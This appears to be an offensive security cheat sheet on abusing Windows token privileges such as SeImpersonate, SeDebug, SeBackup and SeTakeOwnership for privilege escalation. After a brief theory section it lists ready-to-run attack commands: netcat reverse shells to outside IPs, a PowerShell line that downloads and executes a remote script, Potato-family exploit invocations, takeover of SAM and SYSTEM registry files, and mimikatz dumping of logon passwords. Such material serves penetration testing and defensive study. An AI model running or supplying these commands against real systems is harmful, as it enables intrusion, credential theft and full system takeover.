Abusing Tokens

Theory

Each user logged onto the system holds an access token with security information for that logon session. The system creates an access token when the user logs on. Every process executed on behalf of the user has a copy of the access token. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.

You can see this information executing whoami /all

Types of tokens

There are two types of tokens available:

• Primary token: Primary tokens can only be associated to processes, and they represent a process's security subject. The creation of primary tokens and their association to processes are both privileged operations, requiring two different privileges in the name of privilege separation - the typical scenario sees the authentication service creating the token, and a logon service associating it to the user's operating system shell. Processes initially inherit a copy of the parent process's primary token.

• Impersonation token: Impersonation is a security concept implemented in Windows NT that allows a server application to temporarily "be" the client in terms of access to secure objects. Impersonation has four possible levels:

  • anonymous, giving the server the access of an anonymous/unidentified user

  • identification, letting the server inspect the client's identity but not use that identity to access objects

  • impersonation, letting the server act on behalf of the client

  • delegation, same as impersonation but extended to remote systems to which the server connects (through the preservation of credentials).

  The client can choose the maximum impersonation level (if any) available to the server as a connection parameter. Delegation and impersonation are privileged operations (impersonation initially was not, but historical carelessness in the implementation of client APIs failing to restrict the default level to "identification", letting an unprivileged server impersonate an unwilling privileged client, called for it). Impersonation tokens can only be associated to threads, and they represent a client process's security subject. Impersonation tokens are usually created and associated to the current thread implicitly, by IPC mechanisms such as DCE RPC, DDE and named pipes.

Practice

Check privileges

whoami /priv

The tokens that appear as Disabled can be enable, you you actually can abuse Enabled and Disabled tokens.

Enable/Recover All the tokens

#Specify a commandline
.\FullPowers -c "cmd.exe"

#Spawn a revers shell and exit
.\FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z

.\EnableAllTokenPrivs.ps1
whoami /priv

SeImpersonatePrivilege

c:\Users\Public> .\churrasco.exe -d "nc.exe -e cmd.exe IP PORT"

#nc.exe reverse shell
c:\Users\Public>.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

#Powershell reverse shell
c:\Users\Public>.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

# -i : interactive
# -c : command to run
c:\Users\Public> .\PrintSpoofer.exe -i -c cmd.exe
c:\Users\Public> .\PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"

# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
c:\Users\Public> .\RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999

GodPotato -cmd "cmd /c whoami"

SeAssignPrimaryPrivilege

It is very similar to SeImpersonatePrivilege, it will use the same method to get a privileged token. Then, this privilege allows to assign a primary token to a new/suspended process. With the privileged impersonation token you can derivate a primary token (DuplicateTokenEx). With the token, you can create a new process with 'CreateProcessAsUser' or create a process suspended and set the token (in general, you cannot modify the primary token of a running process).

SeTcbPrivilege

If you have enabled this token you can use KERB_S4U_LOGON to get an impersonation token for any other user without knowing the credentials, add an arbitrary group (admins) to the token, set the integrity level of the token to "medium", and assign this token to the current thread (SetThreadToken).

SeBackupPrivilege

This privilege causes the system to grant all read access control to any file (only read). Use it to read the password hashes of local Administrator accounts from the registry and then use "psexec" or "wmicexec" with the hash (PTH). This attack won't work if the Local Administrator is disabled, or if it is configured that a Local Admin isn't admin if he is connected remotely. You can abuse this privilege with:

SeRestorePrivilege

Write access control to any file on the system, regardless of the files ACL. You can modify services, DLL Hijacking, set debugger (Image File Execution Options)… A lot of options to escalate.

SeCreateTokenPrivilege

This token can be used as EoP method only if the user can impersonate tokens (even without SeImpersonatePrivilege). In a possible scenario, a user can impersonate the token if it is for the same user and the integrity level is less or equal to the current process integrity level. In this case, the user could create an impersonation token and add to it a privileged group SID.

SeLoadDriverPrivilege

Load and unload device drivers. You need to create an entry in the registry with values for ImagePath and Type. As you don't have access to write to HKLM, you have to use HKCU. But HKCU doesn't mean anything for the kernel, the way to guide the kernel here and use the expected path for a driver config is to use the path: "\Registry\User\S-1-5-21-582075628-3447520101-2530640108-1003\System\CurrentControlSet\Services\DriverName" (the ID is the RID of the current user). So, you have to create all that path inside HKCU and set the ImagePath (path to the binary that is going to be executed) and Type (SERVICE_KERNEL_DRIVER 0x00000001).\

SeTakeOwnershipPrivilege

This privilege is very similar to SeRestorePrivilege. It allows a process to “take ownership of an object without being granted discretionary access” by granting the WRITE_OWNER access right. First, you have to take ownership of the registry key that you are going to write on and modify the DACL so you can write on it.

takeown /f 'C:\some\file.txt' #Now the file is owned by you
icacls 'C:\some\file.txt' /grant <your_username>:F #Now you have full access
# Use this with files that might contain credentials such as
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
c:\inetpub\wwwwroot\web.config

SeDebugPrivilege

It allows the holder to debug another process, this includes reading and writing to that process' memory. There are a lot of various memory injection strategies that can be used with this privilege that evade a majority of AV/HIPS solutions.

Dump memory

You can then load this dump in mimikatz to obtain passwords:

mimikatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

RCE

If you want to get a NT SYSTEM shell you could use:

# Get the PID of a process running as NT SYSTEM
import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>)

Table

Resources